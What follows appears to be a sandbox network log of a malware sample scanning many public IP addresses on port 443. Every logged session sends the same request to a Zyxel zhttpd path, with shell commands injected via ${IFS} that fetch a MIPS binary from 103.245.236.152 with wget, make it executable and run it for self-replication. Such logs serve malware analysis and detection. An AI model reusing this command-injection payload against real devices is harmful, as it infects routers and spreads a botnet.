                                      Jan 14, 2024 15:51:03.694458961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8722192.168.2.1439428120.104.29.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694523096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8723192.168.2.1449342190.242.154.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694549084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8724192.168.2.145325868.151.79.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694587946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8725192.168.2.145601265.57.15.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694642067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8726192.168.2.1450948168.124.49.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694679022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8727192.168.2.144284465.32.156.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694717884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8728192.168.2.1455112121.171.125.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694762945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8729192.168.2.1456428189.252.210.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694807053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8730192.168.2.145981689.246.67.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694830894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8731192.168.2.1455554192.106.145.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694895029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8732192.168.2.145738483.106.70.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694911957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8733192.168.2.1451692185.53.64.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694951057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8734192.168.2.144446271.167.56.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694997072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8735192.168.2.1445508152.134.171.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695033073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8736192.168.2.144514680.76.60.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695081949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8737192.168.2.143629044.158.228.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695126057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8738192.168.2.1452688213.175.25.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695178032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8739192.168.2.1438842116.139.124.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695219994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8740192.168.2.144093417.173.82.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695257902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8741192.168.2.1455092148.53.35.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695303917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8742192.168.2.1436090175.145.232.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695362091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8743192.168.2.145530843.33.162.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695414066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8744192.168.2.1442048136.227.203.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695439100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8745192.168.2.143671644.22.100.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695497990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8746192.168.2.145504453.236.83.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695533991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8747192.168.2.1445734175.123.28.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695564032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8748192.168.2.1446204197.245.201.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695617914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8749192.168.2.143602051.32.71.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695668936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8750192.168.2.14608385.164.241.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695720911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8751192.168.2.145105494.174.90.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695738077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8752192.168.2.1448654201.130.5.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695800066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8753192.168.2.1442098176.94.231.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695867062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8754192.168.2.1454498218.182.251.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695882082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8755192.168.2.143807437.50.209.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695920944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8756192.168.2.1456024204.250.180.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.695964098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8757192.168.2.144058646.226.50.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696018934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8758192.168.2.1439580150.105.18.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696047068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8759192.168.2.143512253.187.162.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696098089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8760192.168.2.1436080168.245.4.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696147919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8761192.168.2.1455914101.78.132.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696176052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8762192.168.2.1455124128.41.14.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696223021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8763192.168.2.1448612140.85.0.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696273088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8764192.168.2.1446376189.159.29.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696317911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8765192.168.2.1456740110.29.62.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696368933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8766192.168.2.1454372109.59.223.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696397066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8767192.168.2.1442752185.206.17.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696511984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8768192.168.2.144340295.56.207.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696554899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8769192.168.2.1451108147.138.227.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696592093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8770192.168.2.1439676145.147.179.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696640015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8771192.168.2.1440134177.252.45.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696666956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8772192.168.2.145064285.139.138.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696724892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8773192.168.2.144880478.103.198.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696757078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8774192.168.2.1452876206.95.73.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696788073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8775192.168.2.1448530144.119.178.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696835995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8776192.168.2.1449194205.210.27.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696888924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8777192.168.2.1460808208.183.239.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696923971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8778192.168.2.145337460.145.107.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.696979046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8779192.168.2.145136446.173.9.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697035074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8780192.168.2.1454786129.90.172.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697082996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8781192.168.2.144491899.251.85.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697098017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8782192.168.2.144958473.71.103.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697149992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8783192.168.2.1435480106.103.15.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697186947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8784192.168.2.1443858155.192.188.174443
                                      TimestampBytes transferredDirectionData
